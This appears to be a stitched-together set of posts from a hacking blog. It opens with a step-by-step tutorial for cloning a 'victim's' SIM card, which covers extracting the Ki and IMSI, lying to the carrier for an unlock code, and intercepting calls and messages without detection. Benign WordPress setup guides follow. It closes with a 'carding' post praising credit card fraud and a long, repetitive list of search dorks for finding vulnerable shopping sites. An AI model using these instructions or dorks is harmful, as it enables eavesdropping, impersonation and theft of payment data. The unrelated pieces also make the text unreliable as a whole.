Mobile phones are everybody’s need. People mostly do their confidential talks over cell phone’s, But only some know how easy it is to eavesdrop them, there are some tricks and hacks to do that, but the most powerful way is to clone their SIM Card. The Subscriber Identity Module (aka SIM Card) is the transmitter of the signal to the mobile and tower. So let’s understand How to do SIM cloning.

Our SIM cards contain two secret codes or keys called (IMSI value and kI value) which enable the operator to know the mobile number and authenticate the customer, these codes are related to our mobile numbers which the operators store in their vast database, it is based on these secret keys that enable the billing to be made to that customer.

The main mission in cloning any SIM Card is to get KI and IMSI codes, these codes are the identifier of the SIM Card, and help you register your mobile to the network.

By extracting these two secret codes from the SIM and program it into a new blank smart card. Since the operator authentication on SIM is based on these values, it enables us to fool the operators in thinking that it’s the original SIM, this authentication is a flaw with the GSM technology.
Which SIM cards can be cloned?

Not every SIM Card is clone-able, SIM cards are manufactured based on three algorithms COMP128v1, COMP128v2, and COMP128v3. It is important to note currently only COMP128v1 version SIM cards can be cloned since this is the only algorithm, which has been cracked, bear in mind that 70% of all the SIM cards we use are COMP128v1.

How to do SIM Cloning?

Well, There are many things to do when you clone any SIM Card, You can secretly spy on the victim’s calls and data transfers, make him mobile bill go crazy, send messages and make calls from his number, All without touching the victim’s Phone.

Things Required:

  1. Blank Programmable SIM Card
  2. An SIM Firmware Reader/Writer
  3. Download and install : MagicSIM
  4. Download and install : USB SIM Card Reader
  5. Access to Victim’s SIM for 15 to 20 minutes!

Let’s Start Cloning SIM Card

Step 1 : Remove the SIM from the phone, place it in the card reader, click read from the card in magic SIM. When it displays “connected”, select crack SIM in the toolbar.

Step 2 : Click strong kI and select all of the other find options and then click start. Once your kI is found and the crack is finished, click the file, save as and save your cracked SIM info to a file.

Step 3 : You must click disconnect from the file menu or you will ruin your SIM card. {Important! otherwise, your SIM will crack}

Step 4 : Once it says disconnected. Remove the SIM. Put the SIM in your phone and see if it still works, it should. (If not, either you did not unlock your SIM, or you tried to copy it instead of crack and save.)

Unlock SIM Card:

  1. Go in phone tools, select SIM card, then select unlock SIM, it will prompt for a code.
  2. Call network provider, they will ask for your phone number, your account info, name and security code, then they will ask why you want to unlock your SIM card, just tell them you need to unlock your SIM to get it to work with your overseas phone or something.
  3. Once they give you the SIM unlock code, enter it, and it will say SIM unlocked.

Step 5 : Insert blank SIM card and open USB SIM Card Reader Software not magic SIM at this point.

Step 6 : Click connect. It should say “No Info Found” if it is truly blank.

Step 7 : Select write to SIM, it will prompt you to select a .dat file, select the one you saved earlier.

Step 8 : Now click start, it will take about 10 minutes to write it, once it is complete, it will ask for a security code, enter the security code the network provider gave you, then click finish.

DONE : You have successfully cloned the SIM Card. Now when somebody calls the victim, Both of the mobiles will ring, same will happen in the case of SMS, But only one can pick up the call.

Note: – If you try to make two calls at the same time, one will connect and the other will say call failed, both phones will get the same messages, text, and voice, and both will receive the same calls, but only one can talk at a time.

Also don’t do anything big that will raise a red flag in Mobile Companies. You’re responsible for your own Shit and I would like to make one thing clear SIM Card Cloning is illegal. This tutorial should be used for educational purposes only. Please do SIM cloning on your own, not others.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, Hope you like this article and don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

How to Use WordPress for Android

WordPress for Android is a free and open source app for the popular blogger platform. You can use it to get free updates for managing your Blog or WordPress website so learn how to use WordPress for Android.

 

How to Use WordPress for Android

1# Search for “WordPress” in the Google Play Store. It’s the blue icon with the “W” Or download it directly by clicking here on DOWNLOAD”.

Search For WordPress

2# Click “Install” and then “Accept” in the WordPress installation screen. Fire up WordPress app after the downloads get completed to get it started.

Install WordPress               Accept WordPress Installation

3# Now Login with your “Username or Email” and “Password”. Or if you host your WordPress website somewhere else then click on “Add self-hosted site”. This will let you connect your already existent WordPress account to the app on your Android.

Wordpress Login                 WordPress Self Hosted Site

4# Done! You successfully logged in to your WordPress dashboard.

WordPress Dashboard

Tip: Sign up for a WordPress account directly in the app if you don’t already have one.

Precaution: Don’t make your WordPress password too easy to guess otherwise someone could get access to it. The same goes for giving anyone else access to your phone.

So, we hope that HACKAGON have provided some healthy and hygienic knowledge about using the WordPress in android so that readers can begin their blogging or web career with proper ethics. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

How to Use WordPress

How to use WordPress or what to do with WordPress? Do you have something to say that you think the whole world should hear? Blogs are a great way to share your thoughts, ideas, and ramblings with the Internet community. You can improve your writing and make a name for yourself. WordPress is one of the most popular blog services around, and setting up a new blog only takes a few minutes. See below to learn how to make your own blog/website/or Business center.

How To Use WordPress:

1# Visit the WordPress website. Click on the “Get Started” button on the left side of the page to begin signing up for your new blog. This will create a blog on the WordPress site. You won’t be able to monetize the blog, but it will be free.

Many professional bloggers prefer to have their WordPress blog hosted on their own domain (example.com instead of example.wordpress.com). To host your own blog, you will need your own web host.

wordpress website

2# Enter your information. Fill out all of the required fields and click “Create Blog”. You will need to enter a valid email address and create a WordPress username. Underneath the features list, click “Create Blog” to create your free blog. Make sure to read the terms of service! You will have the option of removing the WordPress tag from your URL for a certain yearly fee.

Enter Your Information In WordPress

3# Create an address for your blog. During the sign-up process, you will be asked to create the address (URL) for your blog. You won’t be able to change the URL once you create it, but you can always create a new blog on the same account if you want a new URL address.

Create an address for your blog

4# Open your activation email. When you sign up, you will be sent an email containing an activation link that you will need to follow to turn your account on. Go to your email and activate the blog by pressing the “Activate Blog” button in the email. Once you have activated the blog, a new window will appear called the “Dashboard”. The Dashboard will be the central focus when editing your blog.

Open your activation email

5# Give your new blog a title. On the left side of your dashboard, click on the “Settings” tab and select “General”. In Settings, you can title your blog, give it a tagline, edit your email address, adjust privacy settings, and do other things as well. Take time to explore all the features of the dashboard and get familiar with them.

Give your new blog a title

6# Give your blog a theme. One of the most critical components of your blog is the theme that it has. A theme is a color scheme and specific layout that gives your blog a distinct and unique feel. Explore all of the WordPress themes by clicking on the “Appearance” tab on the left side of the dashboard. Browse themes and select one that you think works well with the topic of your blog.
You can change the theme anytime.

Some themes are “Premium” themes and need to be purchased and if you’re a web developer then the best option is to develop one according to the use.

Give your blog a theme

7# Make your first blog post. Head to the left side of the dashboard and click on the “Posts” tab, then click “Add New”. Give your post a title and start writing! Make sure your first post has an introductory feel to it and gets first-time readers captivated.

Make your first blog post

8# Manage your widgets. Every WordPress blog has a collection of widgets. They are shown on the right/left/footer side on the homepage of your blog. Some popular widgets include a search bar, a Facebook Like option or an Archives link.

  1. To add or remove widgets, move your mouse over the title of your blog in the upper left corner. A drop down menu will appear.
  2. Click on the “Widgets” link. From here, drag the available widgets you want featured into the widget boxes on the right-hand side of the screen.
  3. Remove widgets you dislike by dragging them out of the widget box and back into the “available widgets” area.

Manage your widgets

9# Add pages to your blog. A WordPress blog can contain various pages besides your main posting wall. Pages are a great way to categorize the different content that is featured in your blog. For example, you can have a “Contact Us” page to help your viewers get in touch with you or your company. To create a new page, go to the drop down menu detailed in Step 7, click on “New”, and then “Page” Give your new page a title, and then write the content for that page below.

Add pages to your blog

10# Set your blog apart. There are a lot of blogs out there. If you want yours to stand out, you’ll need to put in a little effort to make it unique. This guide has some tips that can help you make your blog amazing, including posting frequency, reader interaction, optimal post length, and more.

Set your blog apart

11# Promote your blog. Once your blog is up and running, you’ll want to start promoting it to increase your readership. This means utilizing as many avenues as possible, such as social media, email, etc.

Promote Your Blog

So, we hope that HACKAGON have provided some healthy and hygienic knowledge about using the WordPress so that readers can begin their blogging or web career with proper ethics. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


WordPress is the most popular as well as free blogging and CMS platform available. You can download the WordPress database on your website and enhance it using free open-source templates or paid (premium) templates. You will need basic coding and website configuration knowledge to install WordPress without help. Read further to reveal how to install WordPress on your web hosting site.

Domain/Hosting Preparation

1. Buy your domain name. This may involve a one-time purchase fee and/or a yearly fee, depending where you are buying the domain.

When you are ready to go live, you will need to push your domain name to the web hosting site using your NameServer provided at the time of domain purchase, so that they can identify the domain with your website.

2. Choose a web hosting site to host your WordPress website. The web hosting site, blogging platform/CMS (WordPress) and domain name are all parts of the website puzzle that will need to be pulled together in order to have an active, live website.

Some web hosting sites are specifically designed to easily install WordPress. If you are a beginner, you may want to consider using HostGator, Site5, WebHostingHub, BlueHost or InMotion Hosting.

3. Pay a yearly/monthly fee (yearly is recommended) to the web hosting site. You will need to pay a fee to gain access to website email, storage, customization and more. Use your credit/debit card to sign up for the package that bests fits your website’s needs.

4. Check your website to see if there are special instructions for installing WordPress. Some web hosts post their own specialized instructions, or give the option of an assisted installation, instead of a manual installation.

Keep in mind that every web hosting site is a little bit different, so manual installation will vary for each site.

5. Sign up for a File Transfer Protocol (FTP) program. Download the program onto your computer, so that you can easily transfer files from your computer and connect them to your web host.

Your web hosting program may come with an FTP client. If so, you can use this to upload your WordPress files.

Download WordPress

  1. Go to WordPress.org/download and download the latest version of WordPress.
  2. Create a WordPress folder in your Documents section, or in another area on your computer.
  3. Place the WordPress zip file in the new WordPress folder. Double-click the zip file to decompress it.

Create a Database

1. Sign into your web hosting site using the login you chose. Keep this memorized or close at hand so that you can easily sign in to access email or your website.

Check that if your web host does provide a simple WordPress upload tool, such as Fantastico, Softaculous or SimpleScripts. Use this upload tool to select the files and upload a new WordPress database, if you are a beginner or intermediate user then using this is the recommended option.

2. Navigate through your hosting site’s main functions. Look for an option that says “Database”. Click on it when you find it.

3. Look for “Add New Database”, “Add WordPress Database” or “Add MySQL Database”. Click on the option that you see.

4. Name your database. Add any other password or user details that are necessary with your web hosting program.

Memorize your database name, if you plan to have more than 1 database. If you name it using a phrase, it may insert an underscore between the names.

Configure WordPress Files

1. Go to your WordPress folder on your computer. Find the document called “wp-config-sample.php”.

2. Open the document using a text editing program. You should use a notepad program, rather than a word processing program because you do not want to add any formatting.

3. Take a look at the code on the wp-config-sample.php. You will need to change the top 3 lines of code under “My SQL Database”.

  1. Put the name of your database, as written on your web hosting database section in the first line of code. You should replace the text that says “putyournamehere”. Only replace the text, not the parenthesis.
  2. You will need basic coding skills. If you cannot do any coding, you may want to ask a web programmer or friend to help you finish the WordPress installation.
  3. Put your username, taken from your hosting site, in the second line of code. Replace the text “usernamehere”.
  4. Put your database password, taken from the hosting site, in the third line of code. Replace the text “yourpasswordhere”.
  5. Save your file as “wp-config.php”. Once you remove the word “sample” it will be used as your database’s configuration information.

Use FTP Program

1. Sign into your FTP program from your computer. If it is through your web hosting program, navigate to the FTP portion of your web hosting site.

2. Find the /public_html/ section of your FTP program. You may choose to add a subfolder dedicated to this database.

3. Return to your computer’s WordPress folder. Select all the files.

4. Drag them into the /public_html/ section of your FTP. Wait for the files to upload to your FTP.

Install WordPress

1. Type your domain name into your browser. You will type the domain, then add “/wp-admin/install.php” at the end. Click “Enter”.

2. Type the website name and your email address into the form that appears. Agree to the terms and conditions.

3. Click “Install WordPress”.

4. Log in using your automatically generated admin username and password. Click “Log in”.

5. Go to your dashboard and begin making changes on from the admin login. WordPress is installed on your site.

 So, we hope that HACKAGON have provided some healthy and hygienic knowledge about the WordPress Installation so that readers can begin their blogging or web career with proper ethics. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Carding is the art of Credit Card Manipulation to access goods or services by way of fraud. But don’t let the “Politically Correct” definition of carding stop fool you because carding is more than that. Although different people card for different reasons, the motive is usually tied to money. Yea, handling a $10,000 product in your hands and knowing that you didn’t pay a single penny for it is definitely a rush. Grab the Latest Carding Dorks 2017 so that you can easily hack any e-commerce website.

List Of Latest Carding Dorks 2017 :

accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=

archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=

category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=

faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup

item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=

shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
store_bycat.php?id=
store_listing.php?id=
Store_ViewProducts.php?Cat=
store-details.php?id=
storefront.php?id=
storefronts.php?title=
storeitem.php?item=
StoreRedirect.php?ID=
subcategories.php?id=
tek9.php?
template.php?Action=Item&pid=
topic.php?ID=
tuangou.php?bookid=
type.php?iType=
updatebasket.php?bookid=

updates.php?ID=
view.php?cid=
view_cart.php?title=
view_detail.php?ID=
viewcart.php?CartId=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewevent.php?EventID=
viewitem.php?recor=
viewPrd.php?idcategory=
ViewProduct.php?misc=
voteList.php?item_ID=
whatsnew.php?idCategory=
WsAncillary.php?ID=
WsPages.php?ID=noticiasDetalle.php?xid=
sitio/item.php?idcd=
index.php?site=
de/content.php?page_id=
gallerysort.php?iid=
products.php?type=
event.php?id=
showfeature.php?id=
home.php?ID=
tas/event.php?id=
profile.php?id=
details.php?id=
past-event.php?id=
index.php?action=
site/products.php?prodid=
page.php?pId=
resources/vulnerabilities_list.php?id=
site.php?id=
products/index.php?rangeid=
global_projects.php?cid=
publications/view.php?id=
display_page.php?id=
pages.php?ID=
lmsrecords_cd.php?cdid=
product.php?prd=
cat/?catid=
products/product-list.php?id=
debate-detail.php?id=
cbmer/congres/page.php?LAN=
content.php?id=
news.php?ID=
photogallery.php?id=
index.php?id=
product/product.php?product_no=
nyheder.htm?show=
book.php?ID=
print.php?id=
detail.php?id=
book.php?id=
content.php?PID=
more_detail.php?id=
content.php?id=
view_items.php?id=
view_author.php?id=
main.php?id=
english/fonction/print.php?id=
magazines/adult_magazine_single_page.php?magid=
product_details.php?prodid=
magazines/adult_magazine_full_year.php?magid=
products/card.php?prodID=
catalog/product.php?cat_id=
e_board/modifyform.html?code=
community/calendar-event-fr.php?id=
products.php?p=
news.php?id=
view/7/9628/1.html?reply=
product_details.php?prodid=

catalog/product.php?pid=
rating.php?id=
?page=
catalog/main.php?cat_id=
index.php?page=
detail.php?prodid=
products/product.php?pid=
news.php?id=
book_detail.php?BookID=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
default.php?cPath=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
category.php?catid=
categories.php?cat=
categories.php?cat=
detail.php?prodID=
detail.php?id=
category.php?id=
hm/inside.php?id=
index.php?area_id=
gallery.php?id=
products.php?cat=
products.php?cat=
media/pr.php?id=
books/book.php?proj_nr=
products/card.php?prodID=
general.php?id=
news.php?t=
usb/devices/showdev.php?id=
content/detail.php?id=
templet.php?acticle_id=
news/news/title_show.php?id=
product.php?id=
index.php?url=
cryolab/content.php?cid=
ls.php?id=
s.php?w=
abroad/page.php?cid=
bayer/dtnews.php?id=
news/temp.php?id=
index.php?url=
book/bookcover.php?bookid=
index.php/en/component/pvm/?view=
product/list.php?pid=
cats.php?cat=
software_categories.php?cat_id=
print.php?sid=
docDetail.aspx?chnum=
index.php?section=
index.php?page=
index.php?page=
en/publications.php?id=
events/detail.php?ID=
forum/profile.php?id=
media/pr.php?id=
content.php?ID=
cloudbank/detail.php?ID=
pages.php?id=
news.php?id=
beitrag_D.php?id=
content/index.php?id=
index.php?i=
?action=
index.php?page=
beitrag_F.php?id=
index.php?pageid=
page.php?modul=
detail.php?id=
index.php?w=
index.php?modus=
news.php?id=
news.php?id=
aktuelles/meldungen-detail.php?id=
item.php?id=
obio/detail.php?id=
page/de/produkte/produkte.php?prodID=
packages_display.php?ref=
shop/index.php?cPath=
modules.php?bookid=
product-range.php?rangeID=
en/news/fullnews.php?newsid=
deal_coupon.php?cat_id=
show.php?id=
blog/index.php?idBlog=
redaktion/whiteteeth/detail.php?nr=
HistoryStore/pages/item.php?itemID=
aktuelles/veranstaltungen/detail.php?id=
tecdaten/showdetail.php?prodid=
?id=
rating/stat.php?id=
content.php?id=
viewapp.php?id=
item.php?id=
news/newsitem.php?newsID=
FernandFaerie/index.php?c=
show.php?id=
?cat=
categories.php?cat=
category.php?c=
product_info.php?id=
prod.php?cat=
store/product.php?productid=
browsepr.php?pr=
product-list.php?cid=
products.php?cat_id=
product.php?ItemID=
category.php?c=
main.php?id=
article.php?id=
showproduct.php?productId=
view_item.php?item=
skunkworks/content.php?id=
index.php?id=
item_show.php?id=
publications.php?Id=

index.php?t=
view_items.php?id=
portafolio/portafolio.php?id=
YZboard/view.php?id=
index_en.php?ref=
index_en.php?ref=
category.php?id_category=
main.php?id=
main.php?id=
calendar/event.php?id=
default.php?cPath=
pages/print.php?id=
index.php?pg_t=
_news/news.php?id=
forum/showProfile.php?id=
fr/commande-liste-categorie.php?panier=
downloads/shambler.php?id=
sinformer/n/imprimer.php?id=
More_Details.php?id=
directory/contenu.php?id_cat=
properties.php?id_cat=
forum/showProfile.php?id=
downloads/category.php?c=
index.php?cat=
product_info.php?products_id=
product_info.php?products_id=
product-list.php?category_id=
detail.php?siteid=
projects/event.php?id=
view_items.php?id=
more_details.php?id=
melbourne_details.php?id=
more_details.php?id=
detail.php?id=
more_details.php?id=
home.php?cat=
idlechat/message.php?id=
detail.php?id=
print.php?sid=
more_details.php?id=
default.php?cPath=
events/event.php?id=
brand.php?id=
toynbeestudios/content.php?id=
show-book.php?id=
more_details.php?id=
store/default.php?cPath=
property.php?id=
product_details.php?id=
more_details.php?id=
view-event.php?id=
content.php?id=
book.php?id=
page/venue.php?id=
print.php?sid=
colourpointeducational/more_details.php?id=
print.php?sid=
browse/book.php?journalID=
section.php?section=
bookDetails.php?id=
profiles/profile.php?profileid=
event.php?id=
gallery.php?id=
category.php?CID=
corporate/newsreleases_more.php?id=
print.php?id=
view_items.php?id=
more_details.php?id=
county-facts/diary/vcsgen.php?id=
idlechat/message.php?id=
podcast/item.php?pid=
products.php?act=
details.php?prodId=
socsci/events/full_details.php?id=
ourblog.php?categoryid=
mall/more.php?ProdID=
archive/get.php?message_id=
review/review_form.php?item_id=
english/publicproducts.php?groupid=
news_and_notices.php?news_id=
rounds-detail.php?id=
gig.php?id=
board/view.php?no=
index.php?modus=
news_item.php?id=
rss.php?cat=
products/product.php?id=
details.php?ProdID=
els_/product/product.php?id=
store/description.php?iddesc=
socsci/news_items/full_story.php?id=
modules/forum/index.php?topic_id=
feature.php?id=
products/Blitzball.htm?id=
profile_print.php?id=
questions.php?questionid=
html/scoutnew.php?prodid=
main/index.php?action=
********.php?cid=
********.php?cid=
news.php?type=
index.php?page=
viewthread.php?tid=
summary.php?PID=
news/latest_news.php?cat_id=
index.php?cPath=
category.php?CID=
index.php?pid=
more_details.php?id=
specials.php?osCsid=
search/display.php?BookID=
articles.php?id=
print.php?sid=
page.php?id=
more_details.php?id=
newsite/pdf_show.php?id=
shop/category.php?cat_id=
shopcafe-shop-product.php?bookId=
shop/books_detail.php?bookID=
index.php?cPath=
more_details.php?id=
news.php?id=
more_details.php?id=
shop/books_detail.php?bookID=
more_details.php?id=
blog.php?blog=
index.php?pid=
prodotti.php?id_cat=
category.php?CID=
more_details.php?id=
poem_list.php?bookID=
more_details.php?id=
content.php?categoryId=
authorDetails.php?bookID=
press_release.php?id=
item_list.php?cat_id=
colourpointeducational/more_details.php?id=
index.php?pid=
download.php?id=
shop/category.php?cat_id=
i-know/content.php?page=
store/index.php?cat_id=
yacht_search/yacht_view.php?pid=
pharmaxim/category.php?cid=
print.php?sid=
specials.php?osCsid=
store.php?cat_id=
category.php?cid=
displayrange.php?rangeid=
product.php?id=
csc/news-details.php?cat=
products-display-details.php?prodid=
stockists_list.php?area_id=
news/newsitem.php?newsID=
index.php?pid=
newsitem.php?newsid=
category.php?id=
news/newsitem.php?newsID=
details.php?prodId=
publications/publication.php?id=
purelydiamond/products/category.php?cat=
category.php?cid=
product/detail.php?id=
news/newsitem.php?newsID=
details.php?prodID=
item.php?item_id=
edition.php?area_id=
page.php?area_id=
view_newsletter.php?id=
library.php?cat=
categories.php?cat=
page.php?area_id=
categories.php?cat=
publications.php?id=
item.php?sub_id=
page.php?area_id=
page.php?area_id=
category.php?catid=

content.php?cID=
newsitem.php?newsid=
frontend/category.php?id_category=
news/newsitem.php?newsID=
things-to-do/detail.php?id=
page.php?area_id=
page.php?area_id=
listing.php?cat=
item.php?iid=
customer/home.php?cat=
staff/publications.php?sn=
news/newsitem.php?newsID=
library.php?cat=
main/index.php?uid=
library.php?cat=
shop/eventshop/product_detail.php?itemid=
news/newsitem.php?newsID=
news/newsitem.php?newsID=
library.php?cat=
FullStory.php?Id=
publications.php?ID=
publications/book_reviews/full_review.php?id=
newsitem.php?newsID=
newsItem.php?newsId=
site/en/list_service.php?cat=
page.php?area_id=
product.php?ProductID=
releases_headlines_details.php?id=
product.php?shopprodid=
product.php?productid=
product.php?product=
product.php?product_id=
productlist.php?id=
product.php?shopprodid=
garden_equipment/pest-weed-control/product.php?pr=
product.php?shopprodid=
browsepr.php?pr=
productlist.php?id=
kshop/product.php?productid=
product.php?pid=
showproduct.php?prodid=
product.php?productid=
productlist.php?id=
index.php?pageId=
productlist.php?tid=
product-list.php?id=
onlinesales/product.php?product_id=
garden_equipment/Fruit-Cage/product.php?pr=
product.php?shopprodid=
product_info.php?products_id=
productlist.php?tid=
showsub.php?id=
productlist.php?fid=
products.php?cat=
products.php?cat=
product-list.php?id=
product.php?sku=
store/product.php?productid=
products.php?cat=
productList.php?cat=
product_detail.php?product_id=
product.php?pid=
wiki/pmwiki.php?page****=
summary.php?PID=
productlist.php?grpid=
cart/product.php?productid=
db/CART/product_details.php?product_id=
ProductList.php?id=
products/product.php?id=
product.php?shopprodid=
product_info.php?products_id=
product_ranges_view.php?ID=
cei/cedb/projdetail.php?projID=
products.php?DepartmentID=
product.php?shopprodid=
product.php?shopprodid=
product_info.php?products_id=
index.php?news=
education/content.php?page=
Interior/productlist.php?id=
products.php?categoryID=
modules.php?****=
message/comment_threads.php?postID=
artist_art.php?id=
products.php?cat=
index.php?option=
ov_tv.php?item=
index.php?lang=
showproduct.php?cat=
index.php?lang=
product.php?bid=
product.php?bid=
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
item_show.php?lid=
?pagerequested=
downloads.php?id=
print.php?sid=
print.php?sid=
product.php?intProductID=
productList.php?id=
product.php?intProductID=
more_details.php?id=
more_details.php?id=
books.php?id=
index.php?offs=
mboard/replies.php?parent_id=
Computer Science.php?id=
news.php?id=
pdf_post.php?ID=
reviews.php?id=
art.php?id=
prod.php?cat=
event_info.php?p=
view_items.php?id=
home.php?cat=
item_book.php?CAT=
www/index.php?page=
schule/termine.php?view=
goods_detail.php?data=
storemanager/contents/item.php?page_code=
view_items.php?id=
customer/board.htm?mode=
help/com_view.html?code=
n_replyboard.php?typeboard=
eng_board/view.php?T****=
prev_results.php?prodID=
bbs/view.php?no=
gnu/?doc=
zb/view.php?uid=
global/product/product.php?gubun=
m_view.php?ps_db=
naboard/memo.php?bd=
bookmark/mybook/bookmark.php?bookPageNo=
board/board.html?table=
kboard/kboard.php?board=
order.asp?lotid=
english/board/view****.php?code=
goboard/front/board_view.php?code=
bbs/bbsView.php?id=
boardView.php?bbs=
eng/rgboard/view.php?&bbs_id=
product/product.php?cate=
content.php?p=
page.php?module=
?pid=
bookpage.php?id=
view_items.php?id=
index.php?pagina=
product.php?prodid=
notify/notify_form.php?topic_id=
php/index.php?id=
content.php?cid=
product.php?product_id=
constructies/product.php?id=
detail.php?id=
php/index.php?id=
index.php?section=
product.php?****=
show_bug.cgi?id=
detail.php?id=
bookpage.php?id=
product.php?id=
today.php?eventid=
main.php?item=
index.php?cPath=
news.php?id=
event.php?id=
print.php?sid=
news/news.php?id=
module/range/dutch_windmill_collection.php?rangeId=
print.php?sid=

show_bug.cgi?id=
product_details.php?product_id=
products.php?groupid=
projdetails.php?id=
product.php?productid=
products.php?catid=
product.php?product_id=
product.php?prodid=
product.php?prodid=
newsitem.php?newsID=
newsitem.php?newsid=
profile.php?id=
********s_in_area.php?area_id=
productlist.php?id=
productsview.php?proid=
rss.php?cat=
pub/pds/pds_view.php?start=
products.php?rub=
ogloszenia/rss.php?cat=
print.php?sid=
product.php?id=
print.php?sid=
magazin.php?cid=
galerie.php?cid=
www/index.php?page=
view.php?id=
content.php?id=
board/read.php?tid=
product.php?id_h=
news.php?id=
index.php?book=
products.php?act=
reply.php?id=
stat.php?id=
products.php?cat_id=
free_board/board_view.html?page=
item.php?id=
view_items.php?id=
main.php?prodID=
gb/comment.php?gb_id=
gb/comment.php?gb_id=
classifieds/showproduct.php?product=
view.php?pageNum_rscomp=
cart/addToCart.php?cid=
content/pages/index.php?id_cat=
content.php?id=
display.php?ID=
display.php?ID=
ponuky/item_show.php?ID=
default.php?cPath=
main/magpreview.php?id=
***zine/board.php?board=
content.php?arti_id=
mall/more.php?ProdID=
product.php?cat=
news.php?id=
content/view.php?id=
content.php?id=
index.php?action=
board_view.php?s_board_id=
KM/BOARD/readboard.php?id=
board_view.html?id=
content.php?cont_title=
category.php?catid=
mall/more.php?ProdID=
publications.php?id=
irbeautina/product_detail.php?product_id=
print.php?sid=
index_en.php?id=
bid/topic.php?TopicID=
news_content.php?CategoryID=
front/bin/forumview.phtml?bbcode=
cat.php?cat_id=
stat.php?id=
veranstaltungen/detail.php?id=
more_details.php?id=
english/print.php?id=
print.php?id=
view_item.php?id=
content/conference_register.php?ID=
rss/event.php?id=
event.php?id=
main.php?id=
rtfe.php?siteid=
category.php?cid=
classifieds/detail.php?siteid=
tools/print.php?id=
channel/channel-layout.php?objId=
content.php?id=
resources/detail.php?id=
more_details.php?id=
detail.php?id=
view_items.php?id=
content/programme.php?ID=
book.php?id=
php/fid985C124FBD9EF3A29BA8F40521F12D097B0E2016.aspx?s=
detail.php?id=
default.php?cPath=
more_details.php?id=
php/fid8E1BED06B1301BAE3ED64383D5F619E3B1997A70.aspx?s=
content.php?id=
view_items.php?id=
default.php?cPath=
book.php?id=
view_items.php?id=
products/parts/detail.php?id=
category.php?cid=
book.html?isbn=
view_item.php?id=
picgallery/category.php?cid=
detail.php?id=
print.php?sid=
displayArticleB.php?id=
knowledge_base/detail.php?id=
bpac/calendar/event.php?id=
mb_showtopic.php?topic_id=
pages.php?id=

content.php?id=
exhibition_overview.php?id=
singer/detail.php?siteid=
Category.php?cid=
detail.php?id=
print.php?sid=
category.php?cid=
more_detail.php?X_EID=
book.php?ISBN=
view_items.php?id=
category.php?cid=
htmlpage.php?id=
story.php?id=
tools/print.php?id=
print.php?sid=
